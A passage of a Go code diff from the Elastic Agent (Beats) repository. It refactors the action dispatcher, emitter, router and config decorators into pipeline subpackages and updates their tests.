Upgrade is a handler for UPGRADE action. // After running Upgrade agent should download its own version specified by action // from repository specified by fleet. -type handlerUpgrade struct { +type Upgrade struct { log *logger.Logger upgrader *upgrade.Upgrader } -func (h *handlerUpgrade) Handle(ctx context.Context, a action, acker fleetAcker) error { +// NewUpgrade creates a new Upgrade handler. +func NewUpgrade(log *logger.Logger, upgrader *upgrade.Upgrader) *Upgrade { + return &Upgrade{ + log: log, + upgrader: upgrader, + } +} + +// Handle handles UPGRADE action. +func (h *Upgrade) Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error { h.log.Debugf("handlerUpgrade: action '%+v' received", a) action, ok := a.(*fleetapi.ActionUpgrade) if !ok { diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_default.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_default.go new file mode 100644 index 00000000000..37872094233 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_default.go @@ -0,0 +1,31 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package handlers + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +// Default is a default handler. +type Default struct { + log *logger.Logger +} + +// NewDefault creates a new Default handler. +func NewDefault(log *logger.Logger) *Default { + return &Default{ + log: log, + } +} + +// Handle is a default handler, no action is taken. +func (h *Default) Handle(_ context.Context, a fleetapi.Action, acker store.FleetAcker) error { + h.log.Errorf("HandlerDefault: action '%+v' received", a) + return nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_unknown.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_unknown.go new file mode 100644 index 00000000000..a99f7d33528 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_unknown.go @@ -0,0 +1,31 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package handlers + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +// Unknown is a handler for unrecognized actions. +type Unknown struct { + log *logger.Logger +} + +// NewUnknown creates a new Unknown handler. +func NewUnknown(log *logger.Logger) *Unknown { + return &Unknown{ + log: log, + } +} + +// Handle handles unkown actions, no action is taken. +func (h *Unknown) Handle(_ context.Context, a fleetapi.Action, acker store.FleetAcker) error { + h.log.Errorf("HandlerUnknown: action '%+v' received", a) + return nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/action_dispatcher.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher.go similarity index 60% rename from x-pack/elastic-agent/pkg/agent/application/action_dispatcher.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher.go index 6aa8eda8caa..7a1ea23a42d 100644 --- a/x-pack/elastic-agent/pkg/agent/application/action_dispatcher.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package dispatcher import ( "context" @@ -10,30 +10,28 @@ import ( "reflect" "strings" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/actions" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) -type action = fleetapi.Action +type actionHandlers map[string]actions.Handler -type actionHandler interface { - Handle(ctx context.Context, a action, acker fleetAcker) error -} - -type actionHandlers map[string]actionHandler - -type actionDispatcher struct { +// ActionDispatcher processes actions coming from fleet using registered set of handlers. +type ActionDispatcher struct { ctx context.Context log *logger.Logger handlers actionHandlers - def actionHandler + def actions.Handler } -func newActionDispatcher(ctx context.Context, log *logger.Logger, def actionHandler) (*actionDispatcher, error) { +// New creates a new action dispatcher. +func New(ctx context.Context, log *logger.Logger, def actions.Handler) (*ActionDispatcher, error) { var err error if log == nil { - log, err = logger.New("action_dispatcher") + log, err = logger.New("action_dispatcher", false) if err != nil { return nil, err } @@ -43,7 +41,7 @@ func newActionDispatcher(ctx context.Context, log *logger.Logger, def actionHand return nil, errors.New("missing default handler") } - return &actionDispatcher{ + return &ActionDispatcher{ ctx: ctx, log: log, handlers: make(actionHandlers), @@ -51,7 +49,8 @@ func newActionDispatcher(ctx context.Context, log *logger.Logger, def actionHand }, nil } -func (ad *actionDispatcher) Register(a action, handler actionHandler) error { +// Register registers a new handler for action. +func (ad *ActionDispatcher) Register(a fleetapi.Action, handler actions.Handler) error { k := ad.key(a) _, ok := ad.handlers[k] if ok { @@ -61,18 +60,21 @@ func (ad *actionDispatcher) Register(a action, handler actionHandler) error { return nil } -func (ad *actionDispatcher) MustRegister(a action, handler actionHandler) { +// MustRegister registers a new handler for action. +// Panics if not successful. +func (ad *ActionDispatcher) MustRegister(a fleetapi.Action, handler actions.Handler) { err := ad.Register(a, handler) if err != nil { panic("could not register action, error: " + err.Error()) } } -func (ad *actionDispatcher) key(a action) string { +func (ad *ActionDispatcher) key(a fleetapi.Action) string { return reflect.TypeOf(a).String() } -func (ad *actionDispatcher) Dispatch(acker fleetAcker, actions ...action) error { +// Dispatch dispatches an action using pre-registered set of handlers. +func (ad *ActionDispatcher) Dispatch(acker store.FleetAcker, actions ...fleetapi.Action) error { if len(actions) == 0 { ad.log.Debug("No action to dispatch") return nil @@ -99,7 +101,7 @@ func (ad *actionDispatcher) Dispatch(acker fleetAcker, actions ...action) error return acker.Commit(ad.ctx) } -func (ad *actionDispatcher) dispatchAction(a action, acker fleetAcker) error { +func (ad *ActionDispatcher) dispatchAction(a fleetapi.Action, acker store.FleetAcker) error { handler, found := ad.handlers[(ad.key(a))] if !found { return ad.def.Handle(ad.ctx, a, acker) @@ -108,7 +110,7 @@ func (ad *actionDispatcher) dispatchAction(a action, acker fleetAcker) error { return handler.Handle(ad.ctx, a, acker) } -func detectTypes(actions []action) []string { +func detectTypes(actions []fleetapi.Action) []string { str := make([]string, len(actions)) for idx, action := range actions { str[idx] = reflect.TypeOf(action).String() diff --git a/x-pack/elastic-agent/pkg/agent/application/action_dispatcher_test.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher_test.go similarity index 80% rename from x-pack/elastic-agent/pkg/agent/application/action_dispatcher_test.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher_test.go index dab1ac776e7..504778ad804 100644 --- a/x-pack/elastic-agent/pkg/agent/application/action_dispatcher_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher/dispatcher_test.go @@ -2,22 +2,26 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package dispatcher import ( "context" "testing" "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + noopacker "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/noop" ) type mockHandler struct { - received action + received fleetapi.Action called bool err error } -func (h *mockHandler) Handle(_ context.Context, a action, acker fleetAcker) error { +func (h *mockHandler) Handle(_ context.Context, a fleetapi.Action, acker store.FleetAcker) error { h.called = true h.received = a return h.err @@ -42,11 +46,11 @@ func (m *mockActionOther) Type() string { return "mockActionOther" } func (m *mockActionOther) String() string { return "mockActionOther" } func TestActionDispatcher(t *testing.T) { - ack := newNoopAcker() + ack := noopacker.NewAcker() t.Run("Success to dispatch multiples events", func(t *testing.T) { def := &mockHandler{} - d, err := newActionDispatcher(context.Background(), nil, def) + d, err := New(context.Background(), nil, def) require.NoError(t, err) success1 := &mockHandler{} @@ -74,12 +78,13 @@ func TestActionDispatcher(t *testing.T) { t.Run("Unknown action are caught by the unknown handler", func(t *testing.T) { def := &mockHandler{} - d, err := newActionDispatcher(context.Background(), nil, def) + d, err := New(context.Background(), nil, def) require.NoError(t, err) action := &mockActionUnknown{} err = d.Dispatch(ack, action) + require.NoError(t, err) require.True(t, def.called) require.Equal(t, action, def.received) }) @@ -89,7 +94,7 @@ func TestActionDispatcher(t *testing.T) { success2 := &mockHandler{} def := &mockHandler{} - d, err := newActionDispatcher(context.Background(), nil, def) + d, err := New(context.Background(), nil, def) require.NoError(t, err) err = d.Register(&mockAction{}, success1) diff --git a/x-pack/elastic-agent/pkg/agent/application/emitter.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/controller.go similarity index 68% rename from x-pack/elastic-agent/pkg/agent/application/emitter.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/controller.go index 89310ddeb9d..d396385c488 100644 --- a/x-pack/elastic-agent/pkg/agent/application/emitter.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/controller.go @@ -2,14 +2,13 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package emitter import ( - "context" - "strings" "sync" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" @@ -19,28 +18,17 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) -type decoratorFunc = func(*info.AgentInfo, string, *transpiler.AST, []program.Program) ([]program.Program, error) -type filterFunc = func(*logger.Logger, *transpiler.AST) error - type reloadable interface { Reload(cfg *config.Config) error } -type configModifiers struct { - Filters []filterFunc - Decorators []decoratorFunc -} - -type programsDispatcher interface { - Dispatch(id string, grpProg map[routingKey][]program.Program) error -} - -type emitterController struct { +// Controller is an emitter controller handling config updates. +type Controller struct { logger *logger.Logger agentInfo *info.AgentInfo controller composable.Controller - router programsDispatcher - modifiers *configModifiers + router pipeline.Router + modifiers *pipeline.ConfigModifiers reloadables []reloadable caps capabilities.Capability @@ -52,8 +40,33 @@ type emitterController struct { vars []*transpiler.Vars } -func (e *emitterController) Update(c *config.Config) error { - if err := InjectAgentConfig(c); err != nil { +// NewController creates a new emitter controller. +func NewController( + log *logger.Logger, + agentInfo *info.AgentInfo, + controller composable.Controller, + router pipeline.Router, + modifiers *pipeline.ConfigModifiers, + caps capabilities.Capability, + reloadables ...reloadable, +) *Controller { + init, _ := transpiler.NewVars(map[string]interface{}{}, nil) + + return &Controller{ + logger: log, + agentInfo: agentInfo, + controller: controller, + router: router, + modifiers: modifiers, + reloadables: reloadables, + vars: []*transpiler.Vars{init}, + caps: caps, + } +} + +// Update applies config change and performes all steps necessary to apply it. +func (e *Controller) Update(c *config.Config) error { + if err := info.InjectAgentConfig(c); err != nil { return err } @@ -94,7 +107,8 @@ func (e *emitterController) Update(c *config.Config) error { return e.update() } -func (e *emitterController) Set(vars []*transpiler.Vars) { +// Set sets the transpiler vars for dynamic inputs resolution. +func (e *Controller) Set(vars []*transpiler.Vars) { e.lock.Lock() ast := e.ast e.vars = vars @@ -108,7 +122,7 @@ func (e *emitterController) Set(vars []*transpiler.Vars) { } } -func (e *emitterController) update() error { +func (e *Controller) update() error { // locking whole update because it can be called concurrently via Set and Update method e.updateLock.Lock() defer e.updateLock.Unlock() @@ -154,39 +168,5 @@ func (e *emitterController) update() error { } } - return e.router.Dispatch(ast.HashStr(), programsToRun) -} - -func emitter(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, controller composable.Controller, router programsDispatcher, modifiers *configModifiers, caps capabilities.Capability, reloadables ...reloadable) (emitterFunc, error) { - log.Debugf("Supported programs: %s", strings.Join(program.KnownProgramNames(), ", ")) - - init, _ := transpiler.NewVars(map[string]interface{}{}) - ctrl := &emitterController{ - logger: log, - agentInfo: agentInfo, - controller: controller, - router: router, - modifiers: modifiers, - reloadables: reloadables, - vars: []*transpiler.Vars{init}, - caps: caps, - } - err := controller.Run(ctx, func(vars []*transpiler.Vars) { - ctrl.Set(vars) - }) - if err != nil { - return nil, errors.New(err, "failed to start composable controller") - } - return func(c *config.Config) error { - return ctrl.Update(c) - }, nil -} - -func readfiles(files []string, emitter emitterFunc) error { - c, err := config.LoadFiles(files...) - if err != nil { - return errors.New(err, "could not load or merge configuration", errors.TypeConfig) - } - - return emitter(c) + return e.router.Route(ast.HashStr(), programsToRun) } diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter.go new file mode 100644 index 00000000000..8b49bffea44 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter.go @@ -0,0 +1,36 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package emitter + +import ( + "context" + "strings" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" +) + +// New creates a new emitter function. +func New(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, controller composable.Controller, router pipeline.Router, modifiers *pipeline.ConfigModifiers, caps capabilities.Capability, reloadables ...reloadable) (pipeline.EmitterFunc, error) { + log.Debugf("Supported programs: %s", strings.Join(program.KnownProgramNames(), ", ")) + + ctrl := NewController(log, agentInfo, controller, router, modifiers, caps, reloadables...) + err := controller.Run(ctx, func(vars []*transpiler.Vars) { + ctrl.Set(vars) + }) + if err != nil { + return nil, errors.New(err, "failed to start composable controller") + } + return func(c *config.Config) error { + return ctrl.Update(c) + }, nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/emitter_test.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter_test.go similarity index 92% rename from x-pack/elastic-agent/pkg/agent/application/emitter_test.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter_test.go index 7c1975fef64..a38b1bb1ded 100644 --- a/x-pack/elastic-agent/pkg/agent/application/emitter_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/emitter_test.go @@ -2,4 +2,4 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package emitter diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_decorator.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/fleet_decorator.go similarity index 93% rename from x-pack/elastic-agent/pkg/agent/application/fleet_decorator.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/fleet_decorator.go index e2c4a2941bf..688f8423a4f 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_decorator.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/fleet_decorator.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package modifiers import ( "fmt" @@ -15,7 +15,8 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) -func injectFleet(cfg *config.Config, hostInfo types.HostInfo, agentInfo *info.AgentInfo) func(*logger.Logger, *transpiler.AST) error { +// InjectFleet injects fleet metadata into a configuration. +func InjectFleet(cfg *config.Config, hostInfo types.HostInfo, agentInfo *info.AgentInfo) func(*logger.Logger, *transpiler.AST) error { return func(logger *logger.Logger, rootAst *transpiler.AST) error { ecsMeta, err := agentInfo.ECSMetadata() if err != nil { diff --git a/x-pack/elastic-agent/pkg/agent/application/monitoring_decorator.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator.go similarity index 89% rename from x-pack/elastic-agent/pkg/agent/application/monitoring_decorator.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator.go index ab9ff6bbc63..5c1d2d037fd 100644 --- a/x-pack/elastic-agent/pkg/agent/application/monitoring_decorator.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package modifiers import ( "crypto/md5" @@ -14,7 +14,8 @@ import ( ) const ( - monitoringName = "FLEET_MONITORING" + // MonitoringName is a name used for artificial program generated when monitoring is needed. + MonitoringName = "FLEET_MONITORING" programsKey = "programs" monitoringChecksumKey = "monitoring_checksum" monitoringKey = "agent.monitoring" @@ -31,16 +32,16 @@ const ( defaultOutputName = "default" ) -func injectMonitoring(agentInfo *info.AgentInfo, outputGroup string, rootAst *transpiler.AST, programsToRun []program.Program) ([]program.Program, error) { +// InjectMonitoring injects a monitoring configuration into a group of programs if needed. +func InjectMonitoring(agentInfo *info.AgentInfo, outputGroup string, rootAst *transpiler.AST, programsToRun []program.Program) ([]program.Program, error) { var err error monitoringProgram := program.Program{ Spec: program.Spec{ - Name: monitoringName, - Cmd: monitoringName, + Name: MonitoringName, + Cmd: MonitoringName, }, } - config := make(map[string]interface{}) // if monitoring is not specified use default one where everything is enabled if _, found := transpiler.Lookup(rootAst, monitoringKey); !found { monitoringNode := transpiler.NewDict([]transpiler.Node{ @@ -70,7 +71,7 @@ func injectMonitoring(agentInfo *info.AgentInfo, outputGroup string, rootAst *tr return programsToRun, err } - config, err = ast.Map() + config, err := ast.Map() if err != nil { return programsToRun, err } diff --git a/x-pack/elastic-agent/pkg/agent/application/monitoring_decorator_test.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator_test.go similarity index 96% rename from x-pack/elastic-agent/pkg/agent/application/monitoring_decorator_test.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator_test.go index e23027e62fc..8b93fe76280 100644 --- a/x-pack/elastic-agent/pkg/agent/application/monitoring_decorator_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers/monitoring_decorator_test.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package modifiers import ( "fmt" @@ -35,7 +35,7 @@ func TestMonitoringInjection(t *testing.T) { GROUPLOOP: for group, ptr := range programsToRun { programsCount := len(ptr) - newPtr, err := injectMonitoring(agentInfo, group, ast, ptr) + newPtr, err := InjectMonitoring(agentInfo, group, ast, ptr) if err != nil { t.Error(err) continue GROUPLOOP @@ -47,7 +47,7 @@ GROUPLOOP: } for _, p := range newPtr { - if p.Spec.Name != monitoringName { + if p.Spec.Name != MonitoringName { continue } @@ -114,7 +114,7 @@ func TestMonitoringInjectionDefaults(t *testing.T) { GROUPLOOP: for group, ptr := range programsToRun { programsCount := len(ptr) - newPtr, err := injectMonitoring(agentInfo, group, ast, ptr) + newPtr, err := InjectMonitoring(agentInfo, group, ast, ptr) if err != nil { t.Error(err) continue GROUPLOOP @@ -126,7 +126,7 @@ GROUPLOOP: } for _, p := range newPtr { - if p.Spec.Name != monitoringName { + if p.Spec.Name != MonitoringName { continue } @@ -193,7 +193,7 @@ func TestMonitoringInjectionDisabled(t *testing.T) { GROUPLOOP: for group, ptr := range programsToRun { programsCount := len(ptr) - newPtr, err := injectMonitoring(agentInfo, group, ast, ptr) + newPtr, err := InjectMonitoring(agentInfo, group, ast, ptr) if err != nil { t.Error(err) continue GROUPLOOP @@ -205,7 +205,7 @@ GROUPLOOP: } for _, p := range newPtr { - if p.Spec.Name != monitoringName { + if p.Spec.Name != MonitoringName { continue } @@ -299,7 +299,7 @@ func TestChangeInMonitoringWithChangeInInput(t *testing.T) { GROUPLOOPBEFORE: for group, ptr := range programsToRunBefore { programsCount := len(ptr) - newPtr, err := injectMonitoring(agentInfo, group, astBefore, ptr) + newPtr, err := InjectMonitoring(agentInfo, group, astBefore, ptr) if err != nil { t.Error(err) continue GROUPLOOPBEFORE @@ -311,7 +311,7 @@ GROUPLOOPBEFORE: } for _, p := range newPtr { - if p.Spec.Name != monitoringName { + if p.Spec.Name != MonitoringName { continue } @@ -322,7 +322,7 @@ GROUPLOOPBEFORE: GROUPLOOPAFTER: for group, ptr := range programsToRunAfter { programsCount := len(ptr) - newPtr, err := injectMonitoring(agentInfo, group, astAfter, ptr) + newPtr, err := InjectMonitoring(agentInfo, group, astAfter, ptr) if err != nil { t.Error(err) continue GROUPLOOPAFTER @@ -334,7 +334,7 @@ GROUPLOOPAFTER: } for _, p := range newPtr { - if p.Spec.Name != monitoringName { + if p.Spec.Name != MonitoringName { continue } diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/pipeline.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/pipeline.go new file mode 100644 index 00000000000..8286c1ee3a4 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/pipeline.go @@ -0,0 +1,65 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package pipeline + +import ( + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +// ConfigHandler is capable of handling configrequest. +type ConfigHandler interface { + HandleConfig(configrequest.Request) error + Close() error + Shutdown() +} + +// DefaultRK default routing keys until we implement the routing key / config matrix. +var DefaultRK = "default" + +// RoutingKey is used for routing as pipeline id. +type RoutingKey = string + +// Router is an interace routes programs to correspongind stream +type Router interface { + Route(id string, grpProg map[RoutingKey][]program.Program) error + Shutdown() +} + +// StreamFunc creates a stream out of routing key. +type StreamFunc func(*logger.Logger, RoutingKey) (Stream, error) + +// Stream is capable of executing configrequest change. +type Stream interface { + Execute(configrequest.Request) error + Close() error + Shutdown() +} + +// EmitterFunc emits configuration for processing. +type EmitterFunc func(*config.Config) error + +// DecoratorFunc is a func for decorating a retrieved configuration before processing. +type DecoratorFunc = func(*info.AgentInfo, string, *transpiler.AST, []program.Program) ([]program.Program, error) + +// FilterFunc is a func for filtering a retrieved configuration before processing. +type FilterFunc = func(*logger.Logger, *transpiler.AST) error + +// ConfigModifiers is a collections of filters and decorators applied while processing configuration. +type ConfigModifiers struct { + Filters []FilterFunc + Decorators []DecoratorFunc +} + +// Dispatcher processes actions coming from fleet api. +type Dispatcher interface { + Dispatch(acker store.FleetAcker, actions ...fleetapi.Action) error +} diff --git a/x-pack/elastic-agent/pkg/agent/application/router.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/router/router.go similarity index 79% rename from x-pack/elastic-agent/pkg/agent/application/router.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/router/router.go index 3da840a2a3d..6c7a27a2bd9 100644 --- a/x-pack/elastic-agent/pkg/agent/application/router.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/router/router.go @@ -2,42 +2,31 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package router import ( "fmt" "strings" "time" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/sorted" ) -// defautlRK default routing keys until we implement the routing key / config matrix. -var defautlRK = "DEFAULT" - -type routingKey = string - -type stream interface { - Execute(configrequest.Request) error - Close() error - Shutdown() -} - -type streamFunc func(*logger.Logger, routingKey) (stream, error) - type router struct { log *logger.Logger routes *sorted.Set - streamFactory streamFunc + streamFactory pipeline.StreamFunc } -func newRouter(log *logger.Logger, factory streamFunc) (*router, error) { +// New creates a new router. +func New(log *logger.Logger, factory pipeline.StreamFunc) (pipeline.Router, error) { var err error if log == nil { - log, err = logger.New("router") + log, err = logger.New("router", false) if err != nil { return nil, err } @@ -45,7 +34,7 @@ func newRouter(log *logger.Logger, factory streamFunc) (*router, error) { return &router{log: log, streamFactory: factory, routes: sorted.NewSet()}, nil } -func (r *router) Dispatch(id string, grpProg map[routingKey][]program.Program) error { +func (r *router) Route(id string, grpProg map[pipeline.RoutingKey][]program.Program) error { s := sorted.NewSet() // Make sure that starting and updating is always done in the same order. @@ -84,7 +73,7 @@ func (r *router) Dispatch(id string, grpProg map[routingKey][]program.Program) e strings.Join(req.ProgramNames(), ", "), ) - err = p.(stream).Execute(req) + err = p.(pipeline.Stream).Execute(req) if err != nil { return err } @@ -106,7 +95,7 @@ func (r *router) Dispatch(id string, grpProg map[routingKey][]program.Program) e r.log.Debugf("Removing routing key %s", k) - p.(stream).Close() + p.(pipeline.Stream).Close() r.routes.Remove(k) } @@ -121,7 +110,7 @@ func (r *router) Shutdown() { if !ok { continue } - p.(stream).Shutdown() + p.(pipeline.Stream).Shutdown() r.routes.Remove(k) } } diff --git a/x-pack/elastic-agent/pkg/agent/application/router_test.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/router/router_test.go similarity index 63% rename from x-pack/elastic-agent/pkg/agent/application/router_test.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/router/router_test.go index 2de86d0c769..421a0f4cc91 100644 --- a/x-pack/elastic-agent/pkg/agent/application/router_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/router/router_test.go @@ -2,13 +2,14 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package router import ( "testing" "github.com/stretchr/testify/require" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -36,39 +37,39 @@ func (r *rOp) String() string { } type event struct { - rk routingKey + rk pipeline.RoutingKey op rOp } -type notifyFunc func(routingKey, rOp, ...interface{}) +type notifyFunc func(pipeline.RoutingKey, rOp, ...interface{}) func TestRouter(t *testing.T) { programs := []program.Program{program.Program{Spec: program.Supported[1]}} t.Run("create new and destroy unused stream", func(t *testing.T) { recorder := &recorder{} - r, err := newRouter(nil, recorder.factory) + r, err := New(nil, recorder.factory) require.NoError(t, err) - r.Dispatch("hello", map[routingKey][]program.Program{ - defautlRK: programs, + r.Route("hello", map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: programs, }) assertOps(t, []event{ - e(defautlRK, createOp), - e(defautlRK, executeOp), + e(pipeline.DefaultRK, createOp), + e(pipeline.DefaultRK, executeOp), }, recorder.events) recorder.reset() nk := "NEW_KEY" - r.Dispatch("hello-2", map[routingKey][]program.Program{ + r.Route("hello-2", map[pipeline.RoutingKey][]program.Program{ nk: programs, }) assertOps(t, []event{ e(nk, createOp), e(nk, executeOp), - e(defautlRK, closeOp), + e(pipeline.DefaultRK, closeOp), }, recorder.events) }) @@ -77,29 +78,29 @@ func TestRouter(t *testing.T) { k2 := "KEY_2" recorder := &recorder{} - r, err := newRouter(nil, recorder.factory) + 